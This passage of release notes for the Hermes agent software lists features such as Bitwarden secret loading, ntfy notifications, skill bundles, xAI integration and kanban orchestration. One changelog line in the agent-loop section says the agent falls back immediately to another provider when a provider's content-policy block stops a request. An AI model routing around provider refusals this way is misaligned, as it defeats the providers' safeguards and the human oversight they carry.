<p><strong>Bitwarden Secrets Manager — one bootstrap token replaces every per-provider API key</strong> — Stop keeping plaintext API keys in <code>~/.hermes/.env</code>. Install Bitwarden Secrets Manager (<code>bws</code> auto-installs lazily on first use), point Hermes at it with one bootstrap token (<code>BWS_ACCESS_TOKEN</code>), and every credential you need comes from Bitwarden at startup. Rotate a key in the Bitwarden web app and the rotation actually takes effect — Bitwarden defaults to source-of-truth so its values overwrite matching env vars on startup. Flip <code>secrets.bitwarden.override_existing: false</code> to invert. EU Cloud and self-hosted Bitwarden server URLs supported. Detected credentials are now labeled with their source so you can see at a glance which keys came from Bitwarden vs. the local env. (<a href="https://github.com/NousResearch/hermes-agent/pull/30035" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30035/hovercard">#30035</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/31378" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31378/hovercard">#31378</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/30364" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30364/hovercard">#30364</a>)</p>
</li>
<li>
<p><strong>ntfy as the 23rd messaging platform — push notifications without an account</strong> — ntfy is the self-hostable push-notification service with no signup, no API key, just a topic URL. Hermes now adapts to it as a platform plugin (zero edits to core), so your agent can send you push notifications from any cron job, kanban task completion, or chat <code>send_message</code> — to your phone, your watch, your desktop, your homelab. (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/30625" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30625/hovercard">#30625</a> → originally <a href="https://github.com/NousResearch/hermes-agent/pull/4043" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4043/hovercard">#4043</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30867" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30867/hovercard">#30867</a>)</p>
</li>
<li>
<p><strong>Skill bundles — <code>/&lt;name&gt;</code> loads multiple skills at once</strong> — A skill bundle is a named group of skills that loads them all together with one slash command. Set up your "writing day" bundle (humanizer + ideation + obsidian + youtube-content) and <code>/writing-day</code> activates all four for the session. Skills Hub now has health checks, a freshness badge, and a watchdog cron. Three new optional skills land: <code>code-wiki</code> (Karpathy's LLM-Wiki, persistent indexed dev wiki), <code>openhands</code> (delegate to OpenHands for parallel coding agents), and <code>web-pentest</code> (OWASP-style web pentest recipes). (<a href="https://github.com/NousResearch/hermes-agent/pull/28373" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28373/hovercard">#28373</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/32345" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32345/hovercard">#32345</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/32240" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32240/hovercard">#32240</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/32261" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32261/hovercard">#32261</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/32265" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32265/hovercard">#32265</a>)</p>
</li>
<li>
<p><strong>TUI session orchestrator — multiple live sessions in one TUI window</strong> — The Ink TUI gained an active-session switcher overlay. List, switch between, refresh, and close multiple live process-local sessions without leaving the TUI; dispatch a new session with a session-scoped model picker. Plus a wave of TUI polish — mouse-tracking DEC mode presets, scrollback preservation across branches and termux, slash-dropdown fixes, x.com link rendering, and CJK / IME input rendering improvements. (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/27642" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27642/hovercard">#27642</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/32980" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32980/hovercard">#32980</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/30084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30084/hovercard">#30084</a>)</p>
</li>
<li>
<p><strong>Two new image_gen providers — Krea 2 Medium + Large, FAL ported to plugin</strong> — Krea joins the image_gen lineup as a built-in plugin: <code>Krea 2 Medium</code> ($0.03) and <code>Krea 2 Large</code> ($0.06), auto-discovered, selectable via <code>hermes tools</code> → Image Generation → Krea. Available through both the native Krea plugin and the FAL.ai catalog. The FAL.ai backend got pulled out of the monolithic image-generation tool into <code>plugins/image_gen/fal/</code>, completing the four-way architectural parity already established by web, browser, and video_gen — new image providers are now one file, not a fork. (<a href="https://github.com/NousResearch/hermes-agent/pull/33236" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33236/hovercard">#33236</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/30380" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30380/hovercard">#30380</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/33506" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33506/hovercard">#33506</a>)</p>
</li>
<li>
<p><strong>Nous-approved MCP catalog with interactive picker</strong> — A curated catalog of Nous-vetted MCP servers, mirroring the optional-skills shape. Run <code>hermes mcp</code> and you get an interactive picker; install with one keystroke, credentials prompted at install time and written to <code>~/.hermes/.env</code>. Ships with the n8n manifest first. Closes the discovery gap that left users hunting GitHub for trusted MCP servers. (<a href="https://github.com/NousResearch/hermes-agent/pull/30870" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30870/hovercard">#30870</a>)</p>
</li>
<li>
<p><strong>OpenHands orchestration skill</strong> — A new optional skill under <code>optional-skills/autonomous-ai-agents/openhands/</code> lets the agent delegate coding tasks to the OpenHands CLI alongside <code>claude-code</code>, <code>codex</code>, and <code>opencode</code>. OpenHands is the model-agnostic member of that family — any LiteLLM-supported provider works (OpenAI, Anthropic, OpenRouter, your own), so you can route a sub-task to the cheapest model that can finish it. Drop-in worker for kanban swarms and <code>/delegate</code> flows. (closes <a href="https://github.com/NousResearch/hermes-agent/issues/477" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/477/hovercard">#477</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/32261" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32261/hovercard">#32261</a>)</p>
</li>
<li>
<p><strong>Deep xAI integration round — Web Search plugin, OAuth proxy upstream, May 15 retirement detection, natural TTS, security hardening</strong> — Six interlocking xAI improvements:</p>
<ul>
<li><strong>xAI Web Search</strong> lands as a <code>plugins/web/xai/</code> provider, slots alongside Brave / Tavily / Exa / SearXNG / DDGS / Firecrawl — reuses your existing Grok OAuth or <code>XAI_API_KEY</code> credentials, no new env vars. (<a href="https://github.com/NousResearch/hermes-agent/pull/29042" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29042/hovercard">#29042</a>)</li>
<li><strong><code>hermes proxy</code> gains an xAI upstream</strong> — your local OpenAI-compatible endpoint can now be backed by SuperGrok OAuth, no PKCE-refresh code to write in your client. (<a href="https://github.com/NousResearch/hermes-agent/pull/28356" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28356/hovercard">#28356</a>)</li>
<li><strong>May 15 model retirement detection</strong> — <code>grok-4</code>, <code>grok-4-fast{,-reasoning,-non-reasoning}</code>, <code>grok-3</code>, <code>grok-code-fast-1</code>, <code>grok-imagine-image-pro</code> etc. are detected in doctor and chat startup, with <code>hermes migrate xai</code> to one-shot config migration to the supported model. No more silent 404s after the retirement date. (<a href="https://github.com/NousResearch/hermes-agent/pull/29277" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29277/hovercard">#29277</a>)</li>
<li><strong>Opt-in <code>auto_speech_tags</code></strong> for xAI TTS — inserts light <code>[pause]</code> tags between paragraphs and sentences for more natural-sounding voice replies. Default OFF. (<a href="https://github.com/NousResearch/hermes-agent/pull/29376" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29376/hovercard">#29376</a>)</li>
<li><strong><code>xai-oauth</code> <code>base_url</code> pinned to <code>x.ai</code> origin</strong> — closes a silent credential-leak vector where <code>XAI_BASE_URL</code> could repoint OAuth-authenticated inference to an attacker-controlled host. (<a href="https://github.com/NousResearch/hermes-agent/pull/28952" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28952/hovercard">#28952</a>)</li>
<li><strong>OpenAI-style execution guidance applied to Grok models</strong> — Grok and xai-oauth now get the same family-specific execution discipline block GPT/Codex have, so the model stops claiming completion without tool calls and stops suggesting workarounds instead of using existing tools. (<a href="https://github.com/NousResearch/hermes-agent/pull/27797" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27797/hovercard">#27797</a>)</li>
<li>Plus <code>x_search</code> degraded-results surfacing, tier-gated 403 with API-key fallback, PKCE <code>code_challenge</code> round-trip fix, dead-token quarantine on terminal refresh failure, MiniMax-style short-token refresh on per-request, and <code>WKE=unauthenticated</code> honor at both classifier sites. (<a href="https://github.com/NousResearch/hermes-agent/pull/29484" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29484/hovercard">#29484</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28351" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28351/hovercard">#28351</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/27560" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27560/hovercard">#27560</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28116" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28116/hovercard">#28116</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/30619" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30619/hovercard">#30619</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/30872" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30872/hovercard">#30872</a>)</li>
</ul>
</li>
</ul>
<hr>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>The Big Refactor — <code>run_agent.py</code> 16k → 3.8k</h3>
<ul>
<li><code>run_agent.py</code> from 16,083 → 3,821 lines (-76%), extracted into 14 cohesive <code>agent/*</code> modules. <code>run_conversation</code> alone was 3,877 lines before the refactor. Every extraction keeps a thin forwarder on <code>AIAgent</code>, every test-patch path is preserved, every external caller stays compatible. (<a href="https://github.com/NousResearch/hermes-agent/pull/27248" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27248/hovercard">#27248</a>)</li>
</ul>
<h3>Agent loop &amp; conversation</h3>
<ul>
<li>Auxiliary task layered fallback (primary → chain → main agent → graceful fail) on capacity errors (402/429/connection). (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/26811" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26811/hovercard">#26811</a> + <a href="https://github.com/NousResearch/hermes-agent/pull/26998" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26998/hovercard">#26998</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27625" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27625/hovercard">#27625</a>)</li>
<li>Buffer retry/fallback status; surface only on terminal failure (no more noisy "retrying..." spam in mid-run output). (<a href="https://github.com/NousResearch/hermes-agent/pull/33816" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33816/hovercard">#33816</a>)</li>
<li>Host contract for external context engines — condenses 5 prior PRs into one extension surface. (<a href="https://github.com/NousResearch/hermes-agent/pull/33750" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33750/hovercard">#33750</a>)</li>
<li>Fallback immediately on provider content-policy blocks. (<a href="https://github.com/NousResearch/hermes-agent/pull/33883" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33883/hovercard">#33883</a>)</li>
<li>Re-pad <code>reasoning_content</code> on cross-provider fallback to require-side providers. (salvage <a href="https://github.com/NousResearch/hermes-agent/pull/33784" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33784/hovercard">#33784</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33795" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33795/hovercard">#33795</a>)</li>
<li>Per-turn tool-outcome verifier — patch tool gets indent preservation, CRLF preservation, per-file failure escalation. (<a href="https://github.com/NousResearch/hermes-agent/pull/32273" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32273/hovercard">#32273</a>)</li>
<li>Single-knob native vision for custom-provider models. (<a href="https://github.com/NousResearch/hermes-agent/pull/29679" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29679/hovercard">#29679</a>)</li>
<li>Background review fork isolated from external memory plugins. (<a href="https://github.com/NousResearch/hermes-agent/pull/27190" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27190/hovercard">#27190</a>)</li>
<li>Background review inherits parent toolset config for <code>tools[]</code> cache parity. (<a href="https://github.com/NousResearch/hermes-agent/pull/29704" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29704/hovercard">#29704</a>)</li>
<li>Recover from providers returning list-type tool content. (<a href="https://github.com/NousResearch/hermes-agent/pull/30259" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30259/hovercard">#30259</a>)</li>
<li>Treat partial-stream stub responses as length truncation rather than clean stop. (<a href="https://github.com/NousResearch/hermes-agent/pull/30998" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30998/hovercard">#30998</a>)</li>
<li>OpenAI execution guidance applied to xAI Grok / xai-oauth. (<a href="https://github.com/NousResearch/hermes-agent/pull/27797" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27797/hovercard">#27797</a>)</li>
<li>ContextVars propagate to concurrent tool worker threads.</li>
<li>Preload <code>jiter</code> native parser. (<a href="https://github.com/NousResearch/hermes-agent/pull/33692" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33692/hovercard">#33692</a>)</li>
<li>Expose context engine tools with saved toolsets. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/31194" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31194/hovercard">#31194</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33719" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33719/hovercard">#33719</a>)</li>
</ul>
<h3>Sessions &amp; memory</h3>
<ul>
<li><code>session_search</code> rebuilt — single-shape (discovery + scroll + browse), no aux-LLM, ~20ms vs. ~90s. (<a href="https://github.com/NousResearch/hermes-agent/pull/27590" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27590/hovercard">#27590</a>)</li>
<li>Salvage <a href="https://github.com/NousResearch/hermes-agent/pull/29182" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29182/hovercard">#29182</a> — opt-in JSON snapshot writer for sessions. (<a href="https://github.com/NousResearch/hermes-agent/pull/29278" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29278/hovercard">#29278</a>)</li>
<li>Persist <code>platform_message_id</code> for recall across gateway restarts. (<a href="https://github.com/NousResearch/hermes-agent/pull/29449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29449/hovercard">#29449</a>)</li>
<li>Inline memory-context mentions stay visible in conversation. (<a href="https://github.com/NousResearch/hermes-agent/pull/28132" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28132/hovercard">#28132</a>)</li>
<li>Recalled memory labeled informational, not authoritative. (<a href="https://github.com/NousResearch/hermes-agent/pull/28583" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28583/hovercard">#28583</a>)</li>
<li>Memory + context-engine tool injection gated on <code>enabled_toolsets</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/30177" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30177/hovercard">#30177</a>)</li>
<li>Guard against external drift in <code>MEMORY.md</code> / <code>USER.md</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/30877" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30877/hovercard">#30877</a>)</li>
<li>Honcho runtime peer mapping — correctness follow-ups + setup wizard + docs. (<a href="https://github.com/NousResearch/hermes-agent/pull/30077" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30077/hovercard">#30077</a>)</li>
<li>Periodic memory logging for leak detection. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/17667" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17667/hovercard">#17667</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27102" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27102/hovercard">#27102</a>)</li>
</ul>
<h3>Codex / Responses-API maturation</h3>
<ul>
<li>TTFB watchdog for stalled Codex Responses streams. (<a href="https://github.com/NousResearch/hermes-agent/pull/32042" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32042/hovercard">#32042</a>)</li>
<li>Actionable hint when stale-call detector fires on known silent-reject pattern. (<a href="https://github.com/NousResearch/hermes-agent/pull/32016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32016/hovercard">#32016</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/33133" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33133/hovercard">#33133</a>)</li>
<li>Drop SDK <code>responses.stream()</code> helper; consume events directly. (<a href="https://github.com/NousResearch/hermes-agent/pull/33042" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33042/hovercard">#33042</a>)</li>
<li>Gracefully recover from <code>invalid_encrypted_content</code>. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/10144" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/10144/hovercard">#10144</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33035" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33035/hovercard">#33035</a>)</li>
<li>Recover Codex Responses streams with null output. (<a href="https://github.com/NousResearch/hermes-agent/pull/32963" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32963/hovercard">#32963</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/33390" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33390/hovercard">#33390</a>)</li>
<li>Drop foreign-issuer reasoning and transient <code>rs_tmp</code> reasoning replay state. (<a href="https://github.com/NousResearch/hermes-agent/pull/33156" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33156/hovercard">#33156</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/33146" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33146/hovercard">#33146</a>)</li>
<li>Codex 429 quota classified as rate-limit, not missing credentials. (<a href="https://github.com/NousResearch/hermes-agent/pull/33168" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33168/hovercard">#33168</a>)</li>
<li>Codex chat path falls back to credential_pool when singleton is empty. (<a href="https://github.com/NousResearch/hermes-agent/pull/33189" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33189/hovercard">#33189</a>)</li>
<li>Codex re-auth syncs credential_pool. (<a href="https://github.com/NousResearch/hermes-agent/pull/33164" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33164/hovercard">#33164</a>)</li>
<li>Omit <code>tools</code> key when no tools registered. (<a href="https://github.com/NousResearch/hermes-agent/pull/33409" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33409/hovercard">#33409</a>)</li>
<li>Parse Codex image-generation SSE directly. (<a href="https://github.com/NousResearch/hermes-agent/pull/32933" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32933/hovercard">#32933</a>)</li>
</ul>
<hr>
<h2>🎛️ Kanban — Multi-Agent Maturation Wave</h2>
<h3>Orchestration &amp; dispatch</h3>
<ul>
<li>Orchestrator-driven auto-decomposition on triage. (<a href="https://github.com/NousResearch/hermes-agent/pull/27572" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27572/hovercard">#27572</a>)</li>
<li>Kanban swarm topology helper — <code>hermes kanban swarm</code> creates a Swarm v1 graph (root + parallel workers + gated verifier + gated synthesizer + shared blackboard). (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/26791" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26791/hovercard">#26791</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Niraven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Niraven">@Niraven</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/28443" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28443/hovercard">#28443</a>)</li>
<li>Dispatcher wires review agents from the review column. (<a href="https://github.com/NousResearch/hermes-agent/pull/28449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28449/hovercard">#28449</a>)</li>
<li>Stale-detection for running tasks in dispatcher. (<a href="https://github.com/NousResearch/hermes-agent/pull/28452" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28452/hovercard">#28452</a>)</li>
<li>Respawn guard blocks repeat worker storms. (<a href="https://github.com/NousResearch/hermes-agent/pull/28455" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28455/hovercard">#28455</a>)</li>
<li>Respawn guard defers <code>blocker_auth</code> instead of auto-blocking. (<a href="https://github.com/NousResearch/hermes-agent/pull/28683" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28683/hovercard">#28683</a>)</li>
<li>Cross-profile cron jobs surface in dashboard. (<a href="https://github.com/NousResearch/hermes-agent/pull/28457" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28457/hovercard">#28457</a>)</li>
<li>Worker visibility endpoints: <code>/workers/active</code>, <code>/runs/{id}</code>, <code>/inspect</code>. (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/23761" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23761/hovercard">#23761</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Interstellar-code/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Interstellar-code">@Interstellar-code</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/28432" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28432/hovercard">#28432</a>)</li>
</ul>
<h3>Task configuration &amp; scheduling</h3>
<ul>
<li>Per-task model override. (<a href="https://github.com/NousResearch/hermes-agent/pull/28364" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28364/hovercard">#28364</a>)</li>
<li>Board-level default workdir. (<a href="https://github.com/NousResearch/hermes-agent/pull/28394" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28394/hovercard">#28394</a>)</li>
<li>Configurable worktree paths and branches. (<a href="https://github.com/NousResearch/hermes-agent/pull/28462" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28462/hovercard">#28462</a>)</li>
<li>Scheduled task start times. (<a href="https://github.com/NousResearch/hermes-agent/pull/28384" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28384/hovercard">#28384</a>)</li>
<li>Scheduled status for delayed follow-ups. (<a href="https://github.com/NousResearch/hermes-agent/pull/28467" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28467/hovercard">#28467</a>)</li>
<li>Trimmed task comments. (<a href="https://github.com/NousResearch/hermes-agent/pull/28399" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28399/hovercard">#28399</a>)</li>
<li>Initial-status for human-ops cards. (<a href="https://github.com/NousResearch/hermes-agent/pull/28414" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28414/hovercard">#28414</a>)</li>
<li><code>max_in_progress</code> config to cap concurrent running tasks. (<a href="https://github.com/NousResearch/hermes-agent/pull/28420" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28420/hovercard">#28420</a>)</li>
<li>Filter tasks by workflow fields. (<a href="https://github.com/NousResearch/hermes-agent/pull/28454" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28454/hovercard">#28454</a>)</li>
<li><code>--sort</code> for <code>hermes kanban list</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/28427" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28427/hovercard">#28427</a>)</li>
<li>Optional <code>board</code> parameter on all MCP tools. (<a href="https://github.com/NousResearch/hermes-agent/pull/28444" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28444/hovercard">#28444</a>)</li>
<li>Stamp originating ACP session_id on tasks. (<a href="https://github.com/NousResearch/hermes-agent/pull/28447" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28447/hovercard">#28447</a>)</li>
<li><code>auto_promote_children</code> config toggle. (<a href="https://github.com/NousResearch/hermes-agent/pull/28344" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28344/hovercard">#28344</a>)</li>
<li><code>archive --rm</code> to hard-delete archived tasks. (<a href="https://github.com/NousResearch/hermes-agent/pull/28355" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28355/hovercard">#28355</a>)</li>
<li>Promote dependents when parent is archived. (<a href="https://github.com/NousResearch/hermes-agent/pull/28372" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28372/hovercard">#28372</a>)</li>
<li>Promote blocked tasks when parent dependencies complete. (<a href="https://github.com/NousResearch/hermes-agent/pull/28377" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28377/hovercard">#28377</a>)</li>
<li>Demote ready children when parent is reopened. (<a href="https://github.com/NousResearch/hermes-agent/pull/28382" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28382/hovercard">#28382</a>)</li>
<li><code>promote</code> verb for manual <code>todo→ready</code> recovery + bulk <code>--ids</code>. (salvage <a href="https://github.com/NousResearch/hermes-agent/pull/29464" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29464/hovercard">#29464</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/31334" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31334/hovercard">#31334</a>)</li>
</ul>
<h3>Dashboard</h3>
<ul>
<li>Drag-to-delete trash zone + bulk delete. (<a href="https://github.com/NousResearch/hermes-agent/pull/28468" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28468/hovercard">#28468</a>)</li>
<li>Surface per-task <code>model_override</code> in show + tool output. (<a href="https://github.com/NousResearch/hermes-agent/pull/28442" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28442/hovercard">#28442</a>)</li>
<li>Cross-profile notification delivery via <code>kanban.notification_sources</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/28395" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28395/hovercard">#28395</a>)</li>
<li>Scratch-workspace deletion warning for users. (<a href="https://github.com/NousResearch/hermes-agent/pull/30949" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30949/hovercard">#30949</a>)</li>
<li>Mobile dashboard UX polish. (<a href="https://github.com/NousResearch/hermes-agent/pull/28127" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28127/hovercard">#28127</a>)</li>
</ul>
<h3>Reliability</h3>
<ul>
<li>Worker log retention configurable. (<a href="https://github.com/NousResearch/hermes-agent/pull/27867" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27867/hovercard">#27867</a>)</li>
<li>Configurable claim TTL. (<a href="https://github.com/NousResearch/hermes-agent/pull/28392" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28392/hovercard">#28392</a>)</li>
<li>Fingerprint crash errors to prevent fleet-wide retry exhaustion. (<a href="https://github.com/NousResearch/hermes-agent/pull/28380" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28380/hovercard">#28380</a>)</li>
